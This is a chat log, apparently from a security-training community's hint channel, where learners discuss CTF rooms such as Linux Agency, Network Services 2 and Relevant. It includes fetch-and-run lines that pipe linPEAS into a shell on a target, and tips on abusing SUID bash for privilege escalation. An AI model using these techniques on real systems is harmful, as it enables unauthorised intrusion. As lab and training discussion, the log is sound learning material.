so files that user has setuid for u=s
Look at his groups, figure out what that means
can anybody help me out with Cyborg having trouble getting ||borg|| to run
Sure, @pure thistle. What do you have so far? Feel free to DM, if you'd like.
i am on linux agency last task i want to find dailas flag i searched it qute a lot in vektors dir but didnt found any thing great any hint would be appritated
you'll need to log in as dalia
For the metasploit room, when i set lhost to my own tryhackme ip, i enter show options and still shows my own ip addr?
hi! did anyone try to solve the OWASP top 10 room? for some reason the webserver from command injection practical is not working in any browser whatsoever. however using curl i get responses and html back. did anyone else encounter this issue?
try this #site-support message
send screenshot
i dont have the flag for it i ony have viktor flag
yup
so
the goal of the game here is priv esc
what could i send a screenshot of?
your terminal, the commands you ran
i havr to privsec to dailias dir
is that what you mean
by exploiting ssuid binaries
if i am not wrong there was a comand lik perm xyz to find permissions to file can you help me with tha
that
you'll have to enumerate the system
by gobuster
thank you! it worked!
linpeas is a popular script
ok got it
it might find something interesting
thanks
it will list vulnerabalities
will linux.sh work
it was also a script lke limpeas never mind let me try it
i can be wrong
idk how i feel about sending the screenshot with my ips on it tbh i dont think it was anything wrong with the commands i ran but maybe something wrong with the vpn config file or something? When i ran the set LHOST "thm_ip" then i ran show options and my own ip showed up
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh i used this but current speed remains 0
there's no internets on the targets
ohh
grab it locally and serve it via a python server or something
well, if you don't want to send screenshots thats okay, but it will make it harder to troubleshoot, also, showing your private ip is not a problem, unless one of us is in your network we cant talk to your machine, but if it makes you feel better you can take a screenshot and edit it in a image editing software to hide the ips at least for us to know what is going on, but again, no problem showing your private and vpn ips here
Room: Network Services 2
Task: 4 - Exploiting NFS
Been having issues with this task but have been figuring my way through it until now. It gave instructions to add SUID bit permission to bash file using "sudo chmod +[permission] bash" did that, didnt work, still couldnt run the bash file until I did "sudo chmod ### bash" then I did "sudo chmod +[permission] bash".
Now i got the permissions how they are suppose to be, I SSH into the machine as the user, run bash, I get a bash shell. problem is the bash shell has literally zero privileges to run anything. So I can't find the root flag.
Would someone mind advising me where I am going wrong. Not asking for a solution just a nudge in the right direction.
ty for understanding and i just dont feel comfortable doing it honestly. But I feel my question is more geared towards a technical issue. I have completed this room already and I am running through it again for fun. When I originally did it I had a subscription (now I don't). So is it normal even though I set LHOST to the thm ip to show my priv ip on my end?
@hazy sequoia there's a flag you need to stop bash dropping suid permissions
You can find it with research
Verify with the bot, screenshot what you're doing
sorry i meant linenum
doesn't seem normal
was it for me
actually i meant linenum instead if linux .sh
yes
they both do similar things
i wanted a screenshot because i've seen people having problems by setting the lhost for the wrong module
what do you mean, I am literally in the bash shell now
tbh i dont know how to serve it from python server is there any site where i can learn it
I mean exactly what I said. When running the bash binary, you need to use a flag to stop it dropping suid permissions.
setting the lhost and it not changing doesn't have anything to do with your vpn, all of this setting up of the metasploit is going on in your machine, it will speak to the network only when it runs
But also ls -lah and screenshot
so when I run metasploit that will connect my thm ip?
python3 -m http.server 8000 will open a web server on port 8000
@hazy sequoia exit that shell. Then try again in the directory that the binary is in.
the ips need to be right, if the metasploit isn't changing you are either doing something wrong or theres something wrong in your machine, this has nothing to do with your subscription
how to serve limpeas from there
it'll serve from whatever directory you're in
but i think i'll have to modify the command of limpeas
you mean here?
gotcha and I will try to figure this out again at a later time. Thank you for your help
is it for me
curl 10.x.x.x:8000/linpeas.sh | /bin/bash
Notice how it's owned by cappuccino?
or sh, whatevs
It needs to be root owned
Your permissions are also a bit messed up
The s should be lowercase
those r the only permissions that would allow the question to be completed
S means suid but not executable.
You could argue, or you could listen
i ran the command as it said but i kep getting the upper case S
or +x
Then add suid
From your own machine. As root. Where it's mounted.
you may need to sudo
you didn't download it properly
at least you didn't get the raw version
but you got an html page
From the network services room
"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
ah I don't seem to be able to upload photos
!docs verify
what looks interesting?
what shoud i do then
with this link
I'm not sure how to read the files, tried using vi, vim, nano, and cat and get invalid arguement errors
using the attackbox hosted through the site
you can get them and read locally
You're in an smbclient shell
Not a linux or windows command shell
ah alright, tried the get command and it worked, now just gotta look up how to choose where to save the files
thanks friends
you'll by default save to the location you opened the shell from
i have to useit on my local machine or vim
What
??
now I'm lost...
ty for the assist
hey i am doig it for first time please dont lose hope
you get the script from the internet to your attack box, then from the attack box to the target vm
how to do it from attack box to vim
with the python server?
i got the reciveing connection to python server but gave an error 404
where did you store the script?
oh you did a git clone
yes
so you need to add the right folder when you get from the vm
you're serving from /home/kali
the script is in /home/kali/privilege-escalation-awesome-scripts-suite/linPEAS
so i have to change cmd
Still stuck on this question, completed the rest of the questions and found the authentication key. but can't find a profile name anywhere
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
Did you read the file with the long name?
probably a name inside it
Cant figure out how to get it
ah, guess \ doesn't escape that
oh
Use quotes
I see now. Thank you. need to try to remember rules will be different in different shells.
Hi!
Can anyone give me a hint for the room Year of the Rabbit ?
I can speak in a private message so i donΒ΄t spoil anybody
Thanks!
pm me
Do not provide or ask for help or hints for TOC2 room until 8th Feb, 7pm (GMT)
good evening everyone. I am doing the Relevant and i am probably over complicating things. Anyone available for a hint?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Got it!
Room: Relevant - Penetration Testing Challenge
Stage: Enumerating for the first shell, got 1 working account and enumerated all available accounts. Saw the obvious CVEs but they are not working correctly. Also have the available shares.
Tools used so far: nmap, gobuster (didnt find anything), null session rpc and with accounts, smbmap and smbclient, tried psexec with impacket but nothing. Also tried to rdp on it but can't make it. Going for hydra now but i think it is overkill. Tried metasploit but since it is not needed, just gave up on it.
check the shares a bit more closely
Got the first one available, but the other 2 are not working. I can use another one but dunno if its the right way
also the directory-list-2.3-medium.txt list might give results
hmm maybe i misused gobuster, gonna see it again
should be enough to put you back on track
I am trying to access evilshell.php but my connection constantly times out?OWASP top 10 anyone else have a problem?
nevermind Im an idiot!!
can anyone help me out with crack the hash2 how do i create a border mutation rule for JtR useing numbers and special charaters?
I am doing Day 14 Where's Rudolf? Of Learn Cyber Security in 25 days series, I want to find the password for Rudolph's email breach but the recommended free site : scylla.sh is down, unable to find another free site like that, can anyone suggest a good site, thanks.
Hi! I finally got it, thanks!!!
Archangel room. Nice rickroll XD. is backup SUID file just a red herring?
Have you tried to exploit it?
mhm. I don't seem to understand how? Should i transfer it to my local and do RE ?
You need to try and understand what it's doing, I'm sure you can probably use gidra to but it is much more simple to find out than that.
aha i see
I'm using smbclient and need to find out who owns a file - I can't find how I'd do this anywhere unless I've missed something on the smbclient help page?
I don't think you need to do that.
On having a break and re reading the question I just realised π
Still not got it but hopefully will at some point!
Thanx, I'll check that one out
Just finished toc2 by @hallow carbonmints . Learned something new from the root part. Thanks a lot - it was fun